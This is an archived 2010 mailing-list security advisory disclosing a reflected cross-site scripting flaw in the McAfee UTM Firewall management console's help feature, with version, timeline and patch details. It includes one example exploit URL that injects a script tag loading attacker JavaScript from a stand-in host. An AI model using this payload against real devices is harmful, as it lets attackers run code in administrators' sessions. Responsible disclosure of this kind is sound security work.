lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 09 Jun 2010 13:26:34 -0700 From: Adam Baldwin <adam_baldwin@...nuity-is.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: McAfee UTM Firewall Help Reflected Cross-Site Scripting Advisory Information Advisory ID: NGENUITY-2010-005 Date published: 6/9/2010 Vulnerability Information Class: Reflected Cross-Site Scripting (XSS) Software Description McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the affected product line. More information can be found at https://kc.mcafee.com/corporate/index?page=content&id=SB10010 <http://www.mcafee.com/us/enterprise/products/network_security/utm_firewall.html> Vulnerability Description The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) management console is vulnerable to reflected cross-site scripting. It could allow an attacker to cause a user to execute attacker-supplied Javascript code. This attack requires the target to have an existing valid session logged into the UTM device and that the attacker know the internal IP address for the UTM device. McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate this vulnerability *Timeline: * 1/21/2010 - McAfee notified of vulnerability, provided with proof of concept 6/9/2010 - McAfee notified nGenuity of available fix and related information Technical Description *Example Exploit URL: * hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script> Original Posting: http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists